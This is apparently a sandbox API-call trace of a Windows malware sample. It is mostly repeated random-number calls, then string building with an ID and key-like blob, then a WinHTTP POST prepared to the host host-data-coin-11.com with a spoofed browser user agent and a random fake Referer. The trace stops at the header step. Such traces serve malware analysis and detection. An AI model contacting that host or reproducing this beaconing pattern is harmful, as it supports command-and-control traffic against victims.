[0128.057] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c0add8f [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3bd92c02 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x278aae36 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22522621 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc48f64d [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb00eb8 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x722f6286 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7dc70259 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64de4a43 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x60f0cc28 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55c42cfe [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x360b17fb [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24f41e25 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22deae58 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2681a8f8 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c46c88a [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50918bb5 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2691d4f6 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4770a1ac [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x612e7c6b [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f0c3dcc [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f9c4d [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ce2789 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f0bed17 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50a73338 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f11219f [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x65c36833 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58278756 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3128e5 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4531327 [0128.058] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x208b1228 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51295421 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7834d5db [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4abae797 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f31e407 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x513e5ab5 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x510287fb [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbfdeff3 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17f3dfc0 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f8b6b5 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb8480b8 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d21693a [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2014171b [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29c4dc4 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66fc2c26 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f51e334 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x726c1963 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11ae9200 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x598228ca [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4305e5fe [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49bf0672 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c7daad8 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b9b7e1e [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52ead1dd [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70fd947d [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3cd8e9f9 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e965fd9 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66ba1e4e [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x344d3b6a [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x568b5d0f [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47854029 [0128.059] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21c94f5 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x436da973 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a3374a9 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x67dfc64b [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7341e75 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33ea8bf1 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x499d9efe [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3651533e [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48bba486 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2abb4030 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x34d92183 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ff4e40a [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49948245 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43582efe [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x38d35b32 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41b9bbc1 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x8e27ed [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x113edc4e [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7736fbee [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x576ce7a2 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2326978b [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4829ffb5 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x53456055 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x348bb9ec [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x202cd68b [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1df69022 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7063b930 [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x37776c7e [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1254b78b [0128.060] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x660a5e30 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x611ba09b [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x134f51f1 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a642144 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x270546ea [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d63b3a6 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18b3709e [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b3e547d [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4dd27012 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50a44100 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2fff4e61 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f11a4e6 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc1457b6 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfe248c8 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7dc06d8f [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43ccb1de [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5291d248 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e37c5d0 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d6b563f [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61ce151f [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e3665d8 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x200c7ceb [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68b6bead [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7cd7d040 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x538ed6df [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x76013119 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5115527d [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x31bf36a8 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6216e1b1 [0128.061] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x861cbd3 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c344608 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x424a15a4 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x54736db8 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x559e0ef1 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1239638 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b249dc8 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9ed4977 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xdda248 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ffd44d3 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd439e6a [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c68632 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c7ec39b [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x30c26791 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4741db4d [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e3edb77 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ed57c5d [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33bec79 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ed2a4dd [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x691faaec [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x28823ba [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a4e174f [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e7df738 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x524079f5 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x38e5fb8 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x478dc735 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x493a7e82 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5702c5ec [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x676017bc [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d5cfa03 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x710a22de [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b181566 [0128.062] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5880e466 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b8518d1 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46e9de39 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd75331 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x526d7caf [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71e46d28 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2fc4f6da [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16aaaa1b [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d572b11 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x30aef2d2 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32223c36 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf7023c5 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3404310c [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56a0839d [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14bc9e87 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e2ced24 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16328f00 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68c075f4 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1881671e [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69ac70dc [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e61b307 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70d9f16d [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd498c18 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7dd50a44 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x363c2b29 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x184a6184 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2719809b [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x685ec6ff [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63ecbe8d [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f8086c7 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7997c3f0 [0128.063] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63cdf062 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x53771a1d [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d50d564 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ac52478 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d14ae8b [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc57bd8f [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61a56eba [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f828388 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2277b48d [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x38bf8c39 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x196d4279 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6381e8bf [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9e2f349 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x25fa44fa [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfc82e4a [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6fae3994 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a1d7be7 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f3d295a [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10d42612 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c0d43bb [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f599224 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10bf50c4 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77a12f6c [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e482560 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc1cc344 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c8b1fa9 [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x641400ef [0128.064] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ac90b08 [0128.064] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x13c) returned 0x83003a0 [0128.064] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0128.064] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0128.065] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0128.065] lstrcatA (in: lpString1="", lpString2="wQ:zKJB(@1`gwGG-c;\\s!FP/ovjI9fPey7&w'\\;*,29$^o$:azpZpHR,E>5'ZwOo^sY?W]IJVVzE9BH`X(>JbKg#;Lo0SQ0jA#Q`H`-HQWo4k4l_QWGNKu<)1o\\Ik-0:yjpwn.fKx*KIK$#'`qv/IZXZx\"\\>Ak0;2%zKi54aKE*>/o>ifT5qiO9@R+w$i2rTx#inSUtho)*H6ThSqIfC/jQo?YQ.>e" | out: lpString1="wQ:zKJB(@1`gwGG-c;\\s!FP/ovjI9fPey7&w'\\;*,29$^o$:azpZpHR,E>5'ZwOo^sY?W]IJVVzE9BH`X(>JbKg#;Lo0SQ0jA#Q`H`-HQWo4k4l_QWGNKu<)1o\\Ik-0:yjpwn.fKx*KIK$#'`qv/IZXZx\"\\>Ak0;2%zKi54aKE*>/o>ifT5qiO9@R+w$i2rTx#inSUtho)*H6ThSqIfC/jQo?YQ.>e") returned="wQ:zKJB(@1`gwGG-c;\\s!FP/ovjI9fPey7&w'\\;*,29$^o$:azpZpHR,E>5'ZwOo^sY?W]IJVVzE9BH`X(>JbKg#;Lo0SQ0jA#Q`H`-HQWo4k4l_QWGNKu<)1o\\Ik-0:yjpwn.fKx*KIK$#'`qv/IZXZx\"\\>Ak0;2%zKi54aKE*>/o>ifT5qiO9@R+w$i2rTx#inSUtho)*H6ThSqIfC/jQo?YQ.>e" [0128.065] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10c) returned 0x83004f0 [0128.065] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0128.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f12300, cbMultiByte=30, lpWideCharStr=0x83004f0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0128.065] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x7d6f688 | out: pProxyConfig=0x7d6f688) returned 1 [0128.114] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb03a0 [0128.115] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x7d6f740 | out: lpUrlComponents=0x7d6f740) returned 1 [0128.115] WinHttpConnect (hSession=0x3fb03a0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83fd0 [0128.115] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x8300610 [0128.115] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x68) returned 0x8300630 [0128.115] WinHttpOpenRequest (hConnect=0x3f83fd0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x71cad70 [0128.116] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x4e) returned 0x83006a0 [0128.116] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10d) returned 0x8300700 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78b0e29 [0128.116] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x8300820 [0128.116] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x17) returned 0x8300840 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48f685c1 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5969b544 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe13c2c7 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71f0a0f4 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40e8193b [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f163ed3 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46e6bfa4 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ede3a56 [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1bc5fb1d [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c8032ee [0128.116] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc75d538 [0128.116] wsprintfW (in: param_1=0x8300700, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://ivckvkrjmn.com/") returned 44 [0128.116] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300840) returned 0x17 [0128.116] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300840) returned 1 [0128.116] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300820) returned 0x12 [0128.116] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300820) returned 1 [0128.117] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83006a0) returned 0x4e [0128.117] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83006a0) returned 1 [0128.117] WinHttpAddRequestHeaders 